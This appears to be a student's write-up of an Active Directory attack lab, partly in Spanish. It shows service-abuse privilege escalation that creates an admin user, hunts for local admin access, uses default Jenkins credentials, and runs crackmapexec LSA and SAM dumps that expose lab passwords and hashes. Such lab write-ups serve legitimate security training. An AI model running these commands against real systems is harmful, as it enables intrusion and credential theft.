Learning Objective - 5

5. Service abused on the student VM for local privilege escalation

PS C:\AD\Tools> Import-Module .\PowerUp.ps1
PS C:\AD\Tools> Get-ServiceUnquoted -Verbose
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer


ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users;
                 Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True

VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer
ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True

PS C:\AD\Tools> Get-ModifiableServiceFile -Verbose
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer


ServiceName                     : AbyssWebServer
Path                            : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiableFile                  : C:\WebServer\Abyss Web Server
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : Everyone
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'AbyssWebServer'
CanRestart                      : True

PS C:\AD\Tools> Get-ModifiableService -Verbose
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer
VERBOSE: Current user has 'ChangeConfig' for AbyssWebServer
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer


ServiceName   : AbyssWebServer
Path          : C:\WebServer\Abyss Web Server\abyssws.exe -service
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'AbyssWebServer'
CanRestart    : True

Respuesta:

AbyssWebServer

Explotacion

[*] Checking service permissions...


ServiceName   : SNMPTRAP
Path          : C:\Windows\System32\snmptrap.exe
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP'
CanRestart    : True

PS C:\AD\Tools> Invoke-ServiceAbuse -Name 'SNMPTRAP'
WARNING: Waiting for service 'SNMP Trap (SNMPTRAP)' to stop...

ServiceAbused Command
------------- -------
SNMPTRAP      net user john Password123! /add && net localgroup Administrators john /add


PS C:\AD\Tools> net users

User accounts for \\DCORP-STD723

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
john                     WDAGUtilityAccount
The command completed successfully.

Iniciamos una cmd como administrador.

Y luego agregamos nuestro usuario como administrador local.

C:\Windows\system32>net localgroup Administrators dcorp\student723 /add
The command completed successfully.


C:\Windows\system32>net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
dcorp\Domain Admins
dcorp\student723
john
The command completed successfully.

Script utilizado para buscar privilegios de administrador utilizando PowerShell Remoting

Primer intento

PS C:\AD\Tools> Find-LocalAdminAccess -Verbose
VERBOSE: [Find-LocalAdminAccess] Querying computers in the domain
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Invoke-LDAPQuery] filter string: (&(samAccountType=805306369))
VERBOSE: [Get-DomainComputer] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Find-LocalAdminAccess] TargetComputers length: 28
VERBOSE: [Find-LocalAdminAccess] Using threading with threads: 20
VERBOSE: [New-ThreadedFunction] Total number of hosts: 28
VERBOSE: [New-ThreadedFunction] Total number of threads/partitions: 20
VERBOSE: [New-ThreadedFunction] Threads executing
VERBOSE: [New-ThreadedFunction] Waiting 100 seconds for final cleanup...
VERBOSE: [New-ThreadedFunction] all threads completed

Fallido.

Segundo intento:

PS C:\AD\Tools> Get-NetComputer | select samaccountname

samaccountname
--------------
DCORP-DC$
DCORP-ADMINSRV$
DCORP-APPSRV$
DCORP-CI$
DCORP-MGMT$
DCORP-MSSQL$
DCORP-SQL1$
DCORP-STDADMIN$
DCORP-STD721$
DCORP-STD722$
DCORP-STD724$
DCORP-STD723$
DCORP-STD726$
DCORP-STD729$
DCORP-STD725$
DCORP-STD728$
DCORP-STD727$
DCORP-STD731$
DCORP-STD732$
DCORP-STD730$
DCORP-STD733$
DCORP-STD735$
DCORP-STD734$
DCORP-STD736$
DCORP-STD737$
DCORP-STD739$
DCORP-STD740$
DCORP-STD738$

PS C:\AD\Tools> .\Find-WMILocalAdminAccess.ps1 -ComputerFile .\computers.txt

Fallido.

Tercer intento:

PS C:\AD\Tools> . .\Find-PSRemotingLocalAdminAccess.ps1
PS C:\AD\Tools> Find-PSRemotingLocalAdminAccess
dcorp-std723
dcorp-adminsrv

PS C:\AD\Tools> nslookup dcorp-adminsrv
Server:  UnKnown
Address:  172.16.2.1

Name:    dcorp-adminsrv.dollarcorp.moneycorp.local
Address:  172.16.4.101

PS C:\AD\Tools> Enter-PSSession -ComputerName dcorp-adminsrv -Credential dcorp\student723
[dcorp-adminsrv]: PS C:\Users\student723\Documents> whoami
dcorp\student723
[dcorp-adminsrv]: PS C:\Users\student723\Documents> ls
[dcorp-adminsrv]: PS C:\Users\student723\Documents> cd ..
[dcorp-adminsrv]: PS C:\Users\student723> cd /
[dcorp-adminsrv]: PS C:\> ls


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/8/2021   1:15 AM                PerfLogs
d-r---        11/11/2022  12:55 AM                Program Files
d-----          5/8/2021   2:34 AM                Program Files (x86)
d-----         12/3/2023   6:36 AM                Transcripts
d-r---         2/20/2024   4:42 PM                Users
d-----         1/10/2024   1:05 AM                Windows

Jenkins user used to access Jenkins web console

http://172.16.3.11:8080/

manager:manager

builduser:builduser

Link: http://172.16.3.11:8080/job/Project0/configure

Luego obtenemos el resultado:

Respuesta:

builduser

Domain user used for running Jenkins service on dcorp-ci

Respuesta:

dcorp\ciadmin

Plus

crackmapexec smb 172.16.3.11 -u student723 -p hT3qDFRHGzVpJtym --lsa
SMB         172.16.3.11     445    DCORP-CI         [*] Windows 10.0 Build 20348 x64 (name:DCORP-CI) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.3.11     445    DCORP-CI         [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym (Pwn3d!)
SMB         172.16.3.11     445    DCORP-CI         [+] Dumping LSA secrets
SMB         172.16.3.11     445    DCORP-CI         DOLLARCORP.MONEYCORP.LOCAL/ciadmin:$DCC2$10240#ciadmin#3999881514643dbc5cd4efcdce983215
SMB         172.16.3.11     445    DCORP-CI         DOLLARCORP.MONEYCORP.LOCAL/student723:$DCC2$10240#student723#eb5f214b28ad3157316b015e0ceb0dde
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:aes256-cts-hmac-sha1-96:8ec0804e2ed229f58336a750f8627490d3cdcb523de3031acfe4db47fb035073
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:aes128-cts-hmac-sha1-96:00527bdd009fedf4f9e116f7270fd8be
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:des-cbc-md5:d08a1a1fabdfc789
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:plain_password_hex:360056003d002b004c002600470051004e0055003b00220061007500280056004f00390025006a0071003c005f005e003d004600600033004a0071004d0043002200500021005100300068006f005b00490071005b002800430075006d005d007200530025006a004b004b00280023002d005d0064002d006800720049003c006e0042003600760056006f00220044004c00670045007700450059003a002a006300600051003e00600033003e005200430075006e002f0033005e0024007200630034004e002800650045006b0022002400570045007400770071005a0068005b00380026002f004b0048005c007400
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:aad3b435b51404eeaad3b435b51404ee:f76f48c176dc09cfd5765843c32809f3:::
SMB         172.16.3.11     445    DCORP-CI         dpapi_machinekey:0x4796c1a459d09e880ee84dc5958f1cdca366c808
dpapi_userkey:0xeba6b8fb6245f03382bff91e8fb6fd323080b80c
SMB         172.16.3.11     445    DCORP-CI         NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
SMB         172.16.3.11     445    DCORP-CI         dcorp\ciadmin:*ContinuousIntrusion123
SMB         172.16.3.11     445    DCORP-CI         [+] Dumped 10 LSA secrets to /home/dsds/.cme/logs/DCORP-CI_172.16.3.11_2024-02-20_212833.secrets and /home/dsds/.cme/logs/DCORP-CI_172.16.3.11_2024-02-20_212833.cached

crackmapexec smb 172.16.3.11 -u student723 -p hT3qDFRHGzVpJtym --sam
SMB         172.16.3.11     445    DCORP-CI         [*] Windows 10.0 Build 20348 x64 (name:DCORP-CI) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.3.11     445    DCORP-CI         [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym (Pwn3d!)
SMB         172.16.3.11     445    DCORP-CI         [+] Dumping SAM hashes
SMB         172.16.3.11     445    DCORP-CI         Administrator:500:aad3b435b51404eeaad3b435b51404ee:deaa870c264c682aa1fbfc31ebe678a2:::
SMB         172.16.3.11     445    DCORP-CI         Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.3.11     445    DCORP-CI         DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.3.11     445    DCORP-CI         WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.3.11     445    DCORP-CI         [+] Added 4 SAM hashes to the database

PreviousLabs NextLearning Objective - 6

Last updated 1 year ago

hashtag5. Service abused on the student VM for local privilege escalation

hashtagScript utilizado para buscar privilegios de administrador utilizando PowerShell Remoting

hashtagJenkins user used to access Jenkins web console

hashtagDomain user used for running Jenkins service on dcorp-ci

5. Service abused on the student VM for local privilege escalation

Script utilizado para buscar privilegios de administrador utilizando PowerShell Remoting

Jenkins user used to access Jenkins web console

Domain user used for running Jenkins service on dcorp-ci